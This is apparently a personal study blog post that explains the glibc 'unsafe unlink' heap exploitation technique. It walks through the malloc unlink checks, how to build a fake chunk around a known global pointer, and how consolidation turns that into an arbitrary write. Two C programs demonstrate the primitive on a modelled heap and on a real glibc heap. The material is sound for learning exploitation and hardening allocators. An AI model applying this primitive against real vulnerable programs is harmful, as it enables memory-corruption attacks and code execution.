
System Study

unsafe unlink exploit [ Heap exploit ]

marshimaro aSiagaming 2017. 7. 10. 18:03

Unlink Check Routine

The unlink routine in glibc malloc.c first verifies that the chunk p being removed is really linked into its doubly linked list:

p->fd->bk == p

p->bk->fd == p            if either is not satisfied, it aborts with the error message "corrupted double-linked list"

It also checks the chunk's size against the next chunk's prev_size field:        chunksize(p) == prev_size(next_chunk(p))

If the two are not equal, the message "corrupted size vs. prev_size" is thrown. (This size check was added to glibc in 2017, glibc 2.26; older versions only check the fd/bk pointers, which is why the classic unlink attack needed no size field at all.)



How to trigger unsafe unlink?

First, we need one global pointer whose address we know.

ex)

#include <stdlib.h>
#include <stdint.h>

uint64_t *v1;        /* global: its address is fixed (no PIE), and it stores the heap pointer */

int main(){

v1 = malloc(0x80);        // request 0x80 -> chunk size 0x90, not fastbin

return 0;

}

In this case v1 lives at a known address, and the value stored there is the address of the chunk's user data. We can control what v1 points to (we write the fake chunk into that memory), and we know v1's address, which is all the unlink primitive needs.

If we use this well, we can overwrite anything, anywhere.

To trigger unsafe unlink, we need a heap overflow vuln that lets us overwrite the next chunk's prev_size and size fields (clearing the PREV_INUSE bit of size).

If we do so, we can build our fake chunk inside the first chunk's user data and get it unlinked: when the next chunk is freed, free() sees PREV_INUSE clear, computes the "previous" chunk as next_chunk - prev_size, which lands on our fake chunk, and unlinks it to merge the two.        ->        Trigger chunk consolidation.



The unlink routine defined in glibc malloc.c is shown in the photo below (image from the original post).

After the security checks pass, FD->bk = BK and then BK->fd = FD are executed.

In a 64-bit context, my fake chunk's fd should be (char *)&v1 - 24, and by the same reasoning its bk should be (char *)&v1 - 16: bk sits at offset 24 of struct malloc_chunk and fd at offset 16, so fd->bk and bk->fd both read the 8 bytes at &v1, which hold the address of the fake chunk (v1 points at it), and both checks pass. The last write, BK->fd = FD, then stores (char *)&v1 - 24 into v1 itself, so v1[3] is now v1, and writing an address there followed by a write through v1 gives an arbitrary write.

If you can't follow this, you should study struct pointers more, and how dereferencing a struct pointer member turns into a fixed offset from the pointer's base.
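The pointer arithmetic above and the two checks from the Unlink Check Routine section, as an added example (not code from the original post). model_unlink is my own reimplementation of the checks and the two pointer writes, not glibc's code; the heap array, the target variable and the BARRIER macro (a GCC/Clang compiler barrier so the compiler does not keep v1 cached in a register across the aliasing writes) are assumptions for the demo. 64-bit layout is assumed, matching the post.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout of glibc's struct malloc_chunk on 64-bit: 0x00 prev_size, 0x08 size,
 * 0x10 fd, 0x18 bk (fd_nextsize/bk_nextsize of large chunks are not modelled). */
struct chunk {
    uint64_t prev_size;
    uint64_t size;
    struct chunk *fd;
    struct chunk *bk;
};

#define CHUNKSIZE(p)  ((p)->size & ~(uint64_t)7)
#define NEXT_CHUNK(p) ((struct chunk *)((char *)(p) + CHUNKSIZE(p)))
#define BARRIER()     __asm__ __volatile__("" ::: "memory") /* compiler barrier: reload globals */

/* Model of glibc's unlink checks and pointer writes (reimplementation, not glibc code).
 * Returns NULL when the unlink goes through, otherwise the text glibc would abort with. */
const char *model_unlink(struct chunk *p)
{
    if (CHUNKSIZE(p) != NEXT_CHUNK(p)->prev_size)
        return "corrupted size vs. prev_size";          /* glibc >= 2.26 */
    struct chunk *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return "corrupted double-linked list";
    fd->bk = bk;            /* 1st write: *(&v1) = bk */
    bk->fd = fd;            /* 2nd write: *(&v1) = fd, this value wins */
    BARRIER();
    return NULL;
}

uint64_t *v1;                 /* the global pointer from the post */
static uint64_t heap[0x20];   /* constructed stand-in for chunk0's user data + chunk1's header */
static uint64_t target = 0;   /* constructed victim for the arbitrary write */

/* Builds the fake chunk exactly as the post describes and runs it through the checks.
 * good_fd == 0 plants a wrong fd to show which check catches it. */
const char *build_and_unlink(int good_fd)
{
    memset(heap, 0, sizeof heap);
    v1 = heap;                                          /* as if v1 = malloc(0x80) */
    struct chunk *fake = (struct chunk *)heap;
    fake->size = 0x80;                                  /* real chunk is 0x90, fake starts 0x10 later */
    fake->fd = (struct chunk *)((char *)&v1 - 0x18);    /* fd->bk is the 8 bytes at &v1 == fake */
    fake->bk = (struct chunk *)((char *)&v1 - 0x10);    /* bk->fd is the 8 bytes at &v1 == fake */
    if (!good_fd)
        fake->fd = (struct chunk *)heap;                /* fd->bk would read fake->bk, not fake */
    struct chunk *next = NEXT_CHUNK(fake);              /* heap + 0x80: chunk1's header */
    next->prev_size = 0x80;                             /* must equal CHUNKSIZE(fake) */
    next->size = 0x90;                                  /* PREV_INUSE bit cleared */
    return model_unlink(fake);
}

/* After a successful unlink v1 == &v1 - 0x18, so v1[3] is v1 itself: store an address
 * there, then write through v1 once more to land the value anywhere. */
int arbitrary_write(uint64_t *where, uint64_t what)
{
    if (build_and_unlink(1) != NULL) return 0;
    if (v1 != (uint64_t *)((char *)&v1 - 0x18)) return 0;
    v1[3] = (uint64_t)where;    /* redirect v1 */
    BARRIER();
    v1[0] = what;               /* write through the redirected pointer */
    return *where == what;
}

int main(void)
{
    printf("wrong fd  -> %s\n", build_and_unlink(0));
    printf("good fd   -> %s\n", build_and_unlink(1) ? "error" : "checks passed");
    printf("v1 == &v1 - 0x18 ? %s\n", v1 == (uint64_t *)((char *)&v1 - 0x18) ? "yes" : "no");
    int ok = arbitrary_write(&target, 0x4141414141414141ULL);
    printf("arbitrary write -> %s (target = 0x%lx)\n", ok ? "ok" : "failed", (unsigned long)target);
    return ok ? 0 : 1;
}
```

The wrong-fd run shows the failure mode a practitioner hits most often: the size check passes, but fd->bk no longer equals the fake chunk, so glibc would print "corrupted double-linked list" and abort.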





At first, I couldn't understand how to calculate the prev_chunk pointer and the next_chunk pointer....

The answer is in glibc malloc.c -> chunk pointers are calculated from the present chunk's size and prev_size: next_chunk = chunk + chunksize(chunk), prev_chunk = chunk - prev_size(chunk). That is why the overwritten prev_size of the next chunk is what steers free() onto the fake chunk.




how2heap's unsafe_unlink.c is a good reference.

But I wanted to write some new code, so I made something of my own.

The code photo below (image from the original post) is my own code.

It is very similar to the how2heap example.

But if you want to understand it more thoroughly, write your own code.





Summary: heap overflow vuln -> create a fake chunk at the address held by the known global pointer, with fd = &global - 0x18 and bk = &global - 0x10 -> overwrite the next chunk's prev_size (distance to the fake chunk) and size (PREV_INUSE bit cleared) -> free the next chunk -> consolidation unlinks the fake chunk and rewrites the global pointer -> arbitrary write.
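The whole procedure end to end on a real glibc heap, as an added example modelled on how2heap's unsafe_unlink.c; it is not the author's code from the photo above. Assumptions: x86-64 and a glibc with tcache (2.26 or later), which is why 0x420-byte requests are used (0x430 chunks are too large for tcache and fastbin, so free() takes the consolidating path); the "overflow" is simulated by writing chunk1's header directly; chunk0_ptr, victim and the BARRIER macro (a GCC/Clang compiler barrier so chunk0_ptr is re-read after the aliasing writes) are names chosen for the demo.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BARRIER() __asm__ __volatile__("" ::: "memory")  /* compiler barrier: reload chunk0_ptr */

uint64_t *chunk0_ptr;                  /* global pointer at a known address (the post's v1) */
static char victim[16] = "untouched";  /* constructed target for the arbitrary write */

/* Returns 1 when the unlink fired and the write landed in victim, 0 otherwise.
 * If one of glibc's checks fails, glibc itself aborts with its error message. */
int run_unsafe_unlink(void)
{
    /* 0x420 requests give 0x430 chunks: beyond tcache (max 0x410) and fastbin. */
    chunk0_ptr = malloc(0x420);
    uint64_t *chunk1_ptr = malloc(0x420);
    if (!chunk0_ptr || !chunk1_ptr) return 0;
    uint64_t *chunk1_hdr = chunk1_ptr - 2;               /* chunk1's prev_size / size fields */

    /* Fake chunk inside chunk0's user data, starting at chunk0_ptr. */
    chunk0_ptr[1] = (chunk0_ptr[-1] & ~7ULL) - 0x10;     /* size 0x420: distance to chunk1's header */
    chunk0_ptr[2] = (uint64_t)&chunk0_ptr - 3 * sizeof(uint64_t); /* fd: fd->bk == chunk0_ptr */
    chunk0_ptr[3] = (uint64_t)&chunk0_ptr - 2 * sizeof(uint64_t); /* bk: bk->fd == chunk0_ptr */
    /* A 0x420 chunk is large-bin sized; unlink skips the nextsize list only if fd_nextsize is NULL. */
    chunk0_ptr[4] = 0;
    chunk0_ptr[5] = 0;

    /* The "heap overflow": on a real target these two writes come from an overflow out of chunk0. */
    chunk1_hdr[0] = 0x420;       /* prev_size = fake chunk's size */
    chunk1_hdr[1] &= ~1ULL;      /* clear PREV_INUSE: chunk1 now claims its predecessor is free */

    free(chunk1_ptr);            /* backward consolidation -> unlink(fake) -> chunk0_ptr = &chunk0_ptr - 0x18 */
    BARRIER();
    if (chunk0_ptr != (uint64_t *)((char *)&chunk0_ptr - 0x18)) return 0;

    chunk0_ptr[3] = (uint64_t)victim;   /* chunk0_ptr[3] is chunk0_ptr itself: point it at victim */
    BARRIER();
    memcpy(chunk0_ptr, "pwned", 6);     /* writes through chunk0_ptr now land in victim */
    return strcmp(victim, "pwned") == 0;
}

int main(void)
{
    printf("victim before: %s\n", victim);
    int ok = run_unsafe_unlink();
    printf("unsafe unlink %s, victim after: %s\n", ok ? "worked" : "did not fire", victim);
    return ok ? 0 : 1;
}
```

Build it without sanitizers (they replace malloc) and run it once per process: after the free, the fake chunk has been merged into the top chunk, so later allocations would carve from memory that overlaps the fake chunk, which is why the arbitrary write is done immediately and through the global pointer rather than the heap.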


